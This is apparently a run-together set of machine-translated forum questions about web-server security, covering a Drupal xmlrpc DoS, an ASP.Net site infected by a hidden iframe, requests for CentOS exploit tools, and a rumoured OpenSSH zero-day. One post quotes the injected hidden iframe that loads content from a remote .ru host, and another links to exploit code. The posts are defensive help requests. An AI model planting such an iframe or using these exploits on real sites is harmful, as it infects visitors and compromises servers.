我最近成为运行 wordpress 和其他软件的服务器的自豪操作员。今天我仔细查看了日志文件,看看我的服务器上发生了什么。实际上,我只是想看看世界各地的人们如何通过我的工作使用服务和信息(是的,我喜欢我的工作)。不幸的是,我还注意到一些奇怪的活动。不过度甚至残酷,但始终保持不变。研究经常表明,这可能是一种寻找(已知)弱点的尝试。由于我几乎没有运行服务器的经验,所以我想问您这是否正常和/或我是否应该/可以对它做些什么?最好的祝愿:D
我们最近在我们的主要网站上遇到了 DOS 攻击问题,该网站使用 Apache httpd 2.2.9 和 Drupal 6.35 运行。该攻击是 Dupal 的 xmlrpc.php 的一个帖子,这是一个已知的漏洞,已在最新版本的 Drupal 中进行了修补。然而,因为它是一个较旧的版本,漏洞的修复不在我们的 Drupal 安装中——也不会因为我们在三个月内迁移到托管平台。
我最初尝试通过重命名xmlrpc.php来对抗DOS,它返回一个404,但这仍然足以为每个帖子创建一个apache线程结果是多个线程组合起来消耗大量内存,所以仍然存在问题。
因此,基于更多的谷歌搜索,我刚刚修改了 .htaccess 如下:
<Files "xmlrpc.php">
Order Allow,Deny
deny from all
</Files>
从这里开始,大概不会再为每个调用创建一个 httpd 线程了。
你觉得这就够了吗?我可以更进一步,通过启用跟踪 VPC 上的流量并查找和阻止原始 IP 地址的功能,但我不知道这是否有效,因为这些攻击可能来自一群被劫持的系统。虽然我很想知道。有什么想法吗?
我的一个网站最近感染了某种涉及注入隐藏 iframe 的攻击,它的来源来自一个网站 q5x.ru(请勿链接)。
谷歌搜索并没有帮助我弄清楚这次攻击是如何发生的,所以我想知道你们中是否有人遇到过同样的问题?
iframe 代码是这样的:
<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>
根据要求,我正在运行一个带有数据库的 ASP.Net 网站,就表单而言,显然是用于回发的 ASP.Net 表单。
我正在做一项学术工作,我必须在 CentOS 中找到漏洞并展示如何利用这些相同的漏洞。
我不是黑客,我发现这项任务非常困难,也就是说,我看到了所有的安全警报及其描述,但没有解释如何利用。
也许我有点天真,但我只想知道是否有任何工具可以用来证明 CentOS 5.0 漏洞 XPTO 的存在并证明它“有效”。
如果可能的话,例如 CVE-2007-0001 漏洞利用工具、CVE-2007-0002 有效负载等。
谢谢。
我发现当地学校的网站安装了一个 Perl 日历 - 这是几年前的事了,它已经很久没有使用了,但谷歌已经将它编入索引(我就是这样找到它的)并且它充满了伟哥链接等.. . 程序由 Matt Kruse 编写,这里是漏洞利用的详细信息:http ://www.securiteam.com/exploits/5IP040A1QI.html
我已经让学校将其删除,但我认为他们也安装了 MySQL,而且我知道在旧版本中存在一些开箱即用的管理工具/登录漏洞。据我所知,他们还安装了 PHPBB 等...
学校只是在使用一些便宜的共享主机;我得到的 HTTP 响应标头是:
Apache/1.3.29 (Unix) (Red-Hat/Linux) Chili!Soft-ASP/3.6.2 mod_ssl/2.8.14 OpenSSL/0.9.6b PHP/4.4.9 FrontPage/5.0.2.2510
我正在寻找一些方法来检查他们是否安装了其他垃圾(很可能是从很久以前开始的,现在未使用),这可能会使网站处于危险之中。我对可以扫描 MySQL Admin 漏洞利用而不是开放端口等的东西更感兴趣。我的猜测是他们几乎无法控制他们拥有的托管空间 - 但我是 Windows 开发人员,所以这个 * nix 的东西对我来说都是希腊语。
我发现http://www.beyondsecurity.com/看起来它可能会做我想要的(在他们的评估范围内:))但我担心如何找出他们是否众所周知/诚实 - 否则我会用可能存在风险的域名向他们眨眼!
非常感谢。
我认为这是某种类型的黑客攻击。我尝试用谷歌搜索它,但我得到的只是看起来已经被利用的网站。
我看到对我的一个页面的请求看起来像这样。
/listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED
'(200 ok)接受'是奇怪的。但它似乎没有做任何事情。
我在 IIS 5 和 ASP 3.0 上运行。这个“hack”是指其他类型的网络服务器吗?
编辑:
正常请求如下所示:
/listMessages.asp?page=8&catid=5
在我们的环境中,我们经常需要运行不同应用程序的旧版本,我想知道这对安全性的影响。所以我希望有一个网站基本上列出了 AppXX1 版本 V2 有 X 已知漏洞。
我正在考虑更大的应用程序,如 Java、IE。
根据Internet Storm Center的说法,那里似乎存在 SSH 零日漏洞。
这里有一些概念验证代码和一些参考:
- http://secer.org/hacktools/0day-openssh-remote-exploit.html
- http://isc.sans.org/diary.html?storyid=6742
这似乎是一个严重的问题,因此每个 Linux/Unix 系统管理员都应该小心。
如果这个问题没有及时修复,我们如何保护自己?或者你如何处理一般的零日攻击?
*我会在回复中发表我的建议。
寻找一些 (*nix) 软件,该软件将在服务器上构建“有趣”文件的索引,并在某些文件内容被修改或新文件出现时通知。
类似于 rkhunter 等人,但较少关注系统二进制文件,而更多地关注通过 Web 提供的可执行文件。
有什么建议吗?